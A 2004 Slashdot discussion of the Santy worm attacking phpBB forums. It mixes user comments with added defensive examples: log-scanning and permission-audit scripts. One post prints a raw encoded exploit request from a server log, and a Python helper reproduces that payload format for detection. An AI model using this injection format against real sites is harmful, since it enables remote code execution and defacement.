Net Worm Uses Google to Spread

Posted by michael on Tue Dec 21, 2004 05:15 PM
from the web-service-takes-on-new-meaning dept.
troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist, if you use Microsoft's search engine to scan for the phrase 'NeverEverNoSanity' -- part of the defacement text that the Santy worm uses to replace files on infected Web sites -- it returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T: ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.
  • Quick! (Score:5, Funny)

    by Anonymous Coward on Tuesday December 21 2004, @05:16PM (#11153152)
    Someone figure out a way to blame this on Microsoft!
  • by Meostro (788797) * on Tuesday December 21 2004, @05:16PM (#11153153) Homepage Journal
    I saw this yesterday on a.... uhh... "anatomic reference" site:
    This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

    I tried to find some kind of reference and Googled [google.com] for it, but I got no results.

    Still nothing on it, wonder how long it'll be before it shows up?

    MSN search [msn.com] returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta [msn.com] engine for the article.
    • Even better, I did a search on the beta MSN site for 'NeverEverNoSanity WebWorm generation' [msn.com]. The best that I got as a search result was 20 (well, in the first couple of pages), but the site read 11 when I went to it. I suppose that the worm is writing over its own defacement.
    • by orangesquid (79734) <orangesquid&yahoo,com> on Tuesday December 21 2004, @05:58PM (#11153609) Homepage Journal
      You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22NeverEverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
      0, 1, 2, 3 - no hits
      4 - 2335 hits
      5 - 9297 hits
      6 - 7218 hits
      7 - 7288 hits
      8 - 10746 hits
      9 - 12009 hits
      10 - 11752 hits
      11 - 14866 hits
      12 - 13267 hits
      13 - 8393 hits
      14 - 13317 hits
      15 - 3840 hits
      16 - 5004 hits
      17 - 1950 hits
      18 - 3344 hits
      19 - 6 hits
      20 - 1 hit
      21 - 3 hits
      22 - 1 hit
      23 - 1 hit
      24 - 1 hit
      25, 26, 27, 28, 29, 30 - no hits
      • by Anonymous Coward
        umm.. that's just the eicar.com AV test file.. not really a virus - just a file that sets off your AV software so you know it's working. why is this informative?
  • by mkop (714476) * on Tuesday December 21 2004, @05:16PM (#11153155) Journal
    There is nothing wrong with Google, only with people who have not patched their PHP bulletin boards.
  • Poor /. (Score:5, Funny)

    by roman_mir (125474) on Tuesday December 21 2004, @05:17PM (#11153157) Homepage
    I think this virus/worm hit /., when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

  • by akiy (56302) on Tuesday December 21 2004, @05:17PM (#11153168) Homepage
    It looks like the latest phpBB version 2.0.11 [phpbb.com] or a simple patch [phpbb.com] will thwart the worm, though. Time to upgrade if you haven't yet!
    • > It looks like the latest phpBB version 2.0.11 or a simple patch will thwart
      > the worm, though. Time to upgrade if you haven't yet!

      That's alright. All the lazy admins will blame Google and everything will be okay!

      This, I suspect, is going to be a new way of infecting web-based apps. Just do a search for the vulnerable software on Google, Yahoo or whatever, pop in, do your damage and be on your way.

      Of course, it will get much worse if its some sort of E-commerce software or something like that a
      • by topynate (694371) on Tuesday December 21 2004, @05:29PM (#11153308)
        Given that probably 90% of script kiddies find targets with Google, it could only be a matter of time before someone automated the process.

        Maybe it's a theme - the worms of tomorrow will do what the script kiddies of today do.

      • phpBB is very hard to upgrade.

        To install many plugins requires making changes to the source by hand. Some of the websites I host have several of these, and I'm not even sure which ones (I didn't add them).

        Plus, if you use a custom theme you have to recreate it after upgrading, which is a right pain in the arse as all the paths are hardcoded... even with sed/grep it takes an hour or two to turn subSilver into CustomSilver.

    • by Cutriss (262920) on Tuesday December 21 2004, @05:26PM (#11153278) Homepage
      Yes and no.

      It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

      Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.
    • Good job. You do know that by Slashdotting the phpBB.com server, you're preventing people from patching, right? :)
  • it can always use Google Suggest to find victims. :)
  • Microsoft search beats Google at indexing pages hacked by this virus! MS Search turns up 39000 pages, google turns up zero on the same nonsense keyword!
  • by somethinghollow (530478) on Tuesday December 21 2004, @05:18PM (#11153179) Homepage Journal
    When it infects sites running SlashCode, it pretends to be a legitimate post (so it can get the defacement tag "NeverEverNoSanity" on the front page), then monitors for posting, and tries to get first post, too.
  • I got hit HARD! :( (Score:5, Interesting)

    by Broadband (602443) on Tuesday December 21 2004, @05:22PM (#11153238)
    This worm is unbelievably evil.

    What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extensions and overwrites them with the 264 byte file that simply states "Web site defaced"

    I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

    I've been spending the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

    If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

    -BB
    • Unlucky generation 13, eh? I heard it was worse than the others.
      Yes, it was a lame joke. I couldn't think of anything better :(
    • According to W3C, It's not even valid [w3.org] HTML 2.0. The least they could do is write valid code. Sheesh.
    • by Anonymous Coward
      That's why I don't call it a backup if it's hot. If you just put in a second drive, it doesn't save you from 'rm -rf /' or from a power supply that commits suicide... and decides to take the rest of the hardware with it.

      Backups are on cold hardware, on a shelf. At the minimum. Preferably in another building.
    • This is the main issue with hard disks as backup. They don't provide security against this kind of attack, as they are just as vulnerable as any other disk attached to the system.

      A tape drive for backups may seem like a 'thing from the past', but it's *very* effective in these instances...
  • snort signatures (Score:4, Informative)

    by UnderAttack (311872) * on Tuesday December 21 2004, @05:26PM (#11153276) Homepage
    The ISC posted a couple of snort sigs [sans.org] and other details.
  • by The Hobo (783784) on Tuesday December 21 2004, @05:34PM (#11153364)
    I had forgotten the MSN beta search engine, so I just googled it...
  • So I get my present, in the mail, a little early.
    A new HDTV card...
    I go to download [pchdtv.com] the linux only drivers and...

    NeverEverNoSanity!!!

    Argh! &$@*#! Humbug.
  • by VeneficusAcerbus (724294) on Tuesday December 21 2004, @05:43PM (#11153456)
    From ISC:
    Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, it's still a good idea to update php.
  • I got hit (Score:3, Insightful)

    by Ghoser777 (113623) <fahrenba@@@mac...com> on Tuesday December 21 2004, @05:43PM (#11153459) Homepage
    My poor linux box - I felt so secure and then this little worm gets out. Thank god I had some recent backups, otherwise this would have really sucked. I guess it's alright though - you have to get rooted one time before you really understand how vulnerable the internet makes all of us.
      • Not only keep up on patches, but also separation of services. Your web server should run under a chrooted environment at minimum, as a non-privileged user. Any files that don't need to be written to by the web applications (including html and cgi files) should be owned by a different user id (and not world-writable).

        The most secure setup I've come up with is setting up Usermode Linux (or Linux Vservers) so that I have a bunch of virtual OS's running, each with only the bare minimum libraries that are n
  • by falzbro (468756) on Tuesday December 21 2004, @05:58PM (#11153607) Homepage
    I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

    This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

    Here's the first line from the logfile:
    [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)%252echr(101)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%252echr(34)%252echr(111)%252echr(112)%252echr(101)%252echr(110)%252echr(32)%252echr(79)%252echr(85)%252echr(84)%252echr(44)%252echr(113)%252echr(40)%252echr(62)%252echr(109)%252echr(49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102)%252echr(41)%252echr(32)%252echr(97)%252echr(110)%252echr(100)%252echr(32)%252echr(112)%252echr(114)%252echr(105)%252echr(110)%252echr(116)%252echr(32)%252echr(113)%252echr(40)%252echr(72)%252echr(89)%252echr(118)%252echr(57)%252echr(112)%252echr(111)%252echr(52)%252echr(122)%252echr(51)%252echr(106)%252echr(106)%252echr(72)%252echr(87)%252echr(97)%252echr(110)%252echr(78)%252echr(41)%252echr(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    If you decode the ascii characters [asciitable.com], you get:

    perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

    I didn't have enough free time to decode the whole thing due to.. actual work having to be done, but it's quite clever.

    --falz
    • by Anonymous Coward
      Dunno about you guys but I've been getting hits like that since NOVEMBER when the highlight bug first surfaced.

      You might want to amuse yourself with the following PHP code; add it to viewtopic.php right after it checks "isset($HTTP_GET_VARS['highlight']))"...

      if (preg_match('/chr\(/', $HTTP_GET_VARS['highlight'])) {
          // Turn each chr(NNN) (with or without the %2e dot in front) back into
          // the character it stands for. The /e modifier evaluates the
          // replacement as PHP code, which is what PHP 4 offered at the time.
          $h = preg_replace('/(?:%2e)?chr\((\d+)\)/ei', 'chr(\1)',
                            $HTTP_GET_VARS['highlight']);
          // Drop the remaining encoded dots and restore the quotes.
          $h = preg_replace('/%2e/i', '', $h);
          $h = preg_replace('/%27/', "'", $h);
          // The original post is cut off after error_log("viewtopic ha...;
          // the message text below is a stand-in so the block is complete.
          error_log("viewtopic highlight exploit attempt: " . $h);
      }

    • Looks like you didn't read the Bugtraq posting completely... There's an zip attachment with the fully decoded perl script.
      Download link [theaimsgroup.com]
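The request falzbro posted, the PHP snippet the Anonymous Coward sketched, and the Snort signatures UnderAttack points to all do the same job: recognize a highlight= value that has been URL-encoded twice and carries a chr() chain, then recover the command that chain evaluates to. Here is that job done end to end in Python, as an added example (not code from any post here, from phpBB, or from the worm). It reads Apache combined-log lines, pulls the raw highlight= value, undoes both rounds of decoding (PHP's own, then phpBB's extra urldecode()) and rebuilds the chr() chain. The client addresses, the second and third log lines, and the encoding helper that manufactures the worm-style value are constructed for the example; the command string is the one decoded in the post above.

```python
"""Flag and decode phpBB 'highlight' exploit requests in web server logs.

Added example, not taken from the posts above. The request path's highlight=
value is decoded twice (PHP decodes %25xx to %xx, phpBB's extra urldecode()
turns %xx into the character), and the chr(N).chr(N)... chain is rebuilt.
"""
import re
from urllib.parse import unquote

# The command falzbro decoded from his log (see the post above).
EXAMPLE_CMD = 'perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"'


def encode_like_worm(cmd):
    """Build a highlight= value shaped like the posted request: a doubly
    encoded quote and dot, then system(chr(..)%252echr(..)...)."""
    chain = "%252e".join("chr(%d)" % ord(c) for c in cmd)
    return "%2527%252Esystem(" + chain + ")%252e%2527"


# Constructed sample log, not real traffic: one worm-style request, one
# ordinary search highlight, one unrelated page view. IPs are made up.
WORM_LINE = ('10.0.0.5 - - [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php'
             '?p=738&sid=2db342b717c89bf9eca3ef07e4910bf6&highlight='
             + encode_like_worm(EXAMPLE_CMD)
             + ' HTTP/1.0" 200 22613 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"')
SAMPLE_LOG = [
    WORM_LINE,
    '10.0.0.9 - - [20/Dec/2004:11:06:02 -0600] "GET /forum/viewtopic.php?t=12'
    '&highlight=backup+tape HTTP/1.1" 200 18210 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [20/Dec/2004:11:06:10 -0600] "GET /forum/index.php HTTP/1.1"'
    ' 200 9001 "-" "Mozilla/5.0"',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
CHR_RE = re.compile(r"chr\((\d+)\)", re.IGNORECASE)


def raw_query_param(path, name):
    """Return the still-encoded value of ?name= from a request path, or None."""
    if "?" not in path:
        return None
    for pair in path.split("?", 1)[1].split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return value
    return None


def decode_twice(value):
    """PHP: %2527 -> %27. phpBB's extra urldecode(): %27 -> ' (the quote that
    magic_quotes never saw, so it breaks out of the quoted pattern)."""
    return unquote(unquote(value))


def decode_chr_payload(decoded_highlight):
    """Rebuild the string that chr(n).chr(n)... concatenates to."""
    return "".join(chr(int(n)) for n in CHR_RE.findall(decoded_highlight))


def analyze_line(line):
    """Return (is_exploit_attempt, decoded_command_or_None) for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return (False, None)
    raw = raw_query_param(m.group(1), "highlight")
    if raw is None:
        return (False, None)
    decoded = decode_twice(raw)
    # A legitimate highlight is just search words. A quote followed by a
    # ".name(" call means the value escaped the string it was embedded in.
    if "'" in decoded and re.search(r"\.\s*\w+\(", decoded):
        return (True, decode_chr_payload(decoded))
    return (False, None)


def scan(lines):
    """Analyze every line; returns a list of (flag, command) tuples."""
    return [analyze_line(line) for line in lines]


if __name__ == "__main__":
    for line, (hit, cmd) in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print("EXPLOIT" if hit else "ok     ", cmd if hit else line[:60])
```

Run it against a real access log by replacing SAMPLE_LOG with the file's lines; the decoded command for the posted request comes out as the perl one-liner shown above. The same double decoding is why a signature matching only "system(" or a single-quote misses the worm: in the raw request neither appears, only %2527 and a chr() chain.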
  • by bharatman (253051) on Tuesday December 21 2004, @06:03PM (#11153652)

    MSN's first page estimates are always grossly inflated. Try this link instead:

    http://beta.search.msn.com/results.aspx?q=NeverEverNoSanity&first=200&count=10&FORM=PERE4

    Note that the "first" param is 200 (which is the equivalent of going to page 20). It hits the end of the results and revises its estimate.
  • by AC-x (735297) on Tuesday December 21 2004, @06:27PM (#11153845)
    Looking at all the automatic PHP error responses, it seems that as long as the web server's task does not have write access to the web sites folder you're safe.
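Several posts above come down to one check: content the application never writes (HTML, PHP, CGI) should not be writable by the account the web server runs as, and neither should the directories holding it, because a writable directory lets a file be replaced even when the file itself is read-only. The script below walks a document root and reports what that account could modify. It is an added example, not from any post or from phpBB; the web server uid/gid (33/33 in the usage, a common www-data pair) and the sample tree are assumptions, and the tree is built in a temporary directory so the example runs offline.

```python
"""Audit a web root for files and directories the web server account can write.

Added example, not from the posts above. Implements the check several of them
recommend: nothing the application only needs to read should be writable by
the uid/gid Apache runs as, nor world-writable.
"""
import os
import stat
import tempfile

WEB_SUFFIXES = (".php", ".html", ".htm", ".shtml", ".asp", ".pl", ".cgi")


def writable_by(mode, file_uid, file_gid, uid, gid):
    """Classic Unix permission check: does (uid, gid) get write access?
    Root is deliberately not special-cased; the worm ran as the web user."""
    if file_uid == uid:
        return bool(mode & stat.S_IWUSR)
    if file_gid == gid:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def writable_files(root, uid, gid, suffixes=WEB_SUFFIXES):
    """Return relative paths under root that the (uid, gid) account could
    overwrite: web content files, plus any directory (reported with a
    trailing slash), since a writable directory allows replacing its files."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue
            if writable_by(st.st_mode, st.st_uid, st.st_gid, uid, gid):
                hits.append(os.path.relpath(path, root) + "/")
        for name in filenames:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and writable_by(
                    st.st_mode, st.st_uid, st.st_gid, uid, gid):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_demo_tree():
    """Constructed sample tree (assumption for the example): one locked-down
    page, one world-writable page, one world-writable non-web file that must
    not be reported, and one world-writable directory."""
    root = tempfile.mkdtemp(prefix="docroot-")
    for rel, mode in (("forum", 0o755), ("uploads", 0o777)):
        os.mkdir(os.path.join(root, rel))
        os.chmod(os.path.join(root, rel), mode)
    files = {
        "index.html": 0o644,
        "forum/viewtopic.php": 0o666,  # anyone, web user included, may write
        "forum/notes.txt": 0o666,      # writable, but not web content
    }
    for rel, mode in files.items():
        path = os.path.join(root, rel)
        with open(path, "w") as fh:
            fh.write("sample\n")
        os.chmod(path, mode)
    return root


if __name__ == "__main__":
    # Hypothetical web server account that owns none of the demo files.
    for hit in writable_files(build_demo_tree(), uid=33, gid=33):
        print("writable by web user:", hit)
```

Point it at a real docroot with the uid and gid from the User/Group directives of the Apache config; anything it lists is exactly what a compromised viewtopic.php could have overwritten, so the fix is chown to a different owner and chmod away the group/other write bits.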
  • by Chatmag (646500) <editor@chatmag.com> on Tuesday December 21 2004, @09:09PM (#11155110) Homepage Journal
    http://www.hackgeneral.net/phpbb_exploit.php

    When I first saw that page a few days ago, it had several boxes for inputs, the site URL, code, and execute button. The page is now gone, and if someone speaks Spanish, please let us all know what the site is about.
    • Re:Hmmmm (Score:4, Informative)

      by Sikmaz (686372) on Tuesday December 21 2004, @05:29PM (#11153313)
      Different Exploit, that is a separate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10
      • by a16 (783096) on Tuesday December 21 2004, @05:56PM (#11153582)
        As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

        This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

        So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

        I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)
    • Dshield disagrees (Score:4, Insightful)

      by JustinXB (756624) on Tuesday December 21 2004, @05:31PM (#11153334)
      See here [sans.org]
      Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case.
      Who are you going to believe: Some news site or a security community?
    • As I posted above, that is a separate problem that allows people to do even more bad things such as reading your config.php to get your sql password. A workaround is available from http://www.phpbbstyles.com/viewtopic.php?t=1903 if you can't install 4.3.10
      • Err crap, I shouldn't have copied and pasted my post isn't entirely clear in this context ;) This worm exploits a problem in PHPBB 2.0.10 that is fixed in 2.0.11. The other issue is a PHP problem that can be solved via the work around I posted above or using PHP 4.3.10.
    • No, as someone else already responded to other posts, it is a phpBB problem. phpBB calls the urldecode() function on form variables, after PHP already does so. It allows ' to bypass the magic quotes that php so lovingly puts on all our form data. The latest bug reports were reported after the release of the exploit for phpBB 2.0.10 and earlier. IIRC the report said that some scripts MAY be vulnerable, but didnt state for certain. As far as I know, no one has yet to release an exploit for the bugs, its
    • The virus is searching google for sites not yet infected. Googling [google.com] for "Powered by phpBB" does return results. Some of which are now defaced.

      If google wants to stop the virus then they could disable "Powered by phpBB" as a search term. The reason "NeverEverNoSanity" doesn't come up on google is because googlebot is extremely slow to index new content on most sites.

    • Re:Clarification (Score:5, Informative)

      by ScottMacVicar (751480) * on Tuesday December 21 2004, @06:39PM (#11153960)
      I've been looking at the PHP related security hole and this does not have anything to do with the exploit the worm uses.

      The PHP exploit was to do with the length part of a serialized string, it wasn't correctly enforced and a suitably large value would cause a crash and print out contents of the stack which could include any variable within the script. s:1000:"test"; the 1000 part is not correctly checked.

      The phpBB exploit is regarding a remote code execution vulnerability, in this case it uses this vulnerability to fetch a perl script from a remote server and write it to the forum before executing it using the system command in PHP.

      So this worm only affects phpBB 2.0.10 and below.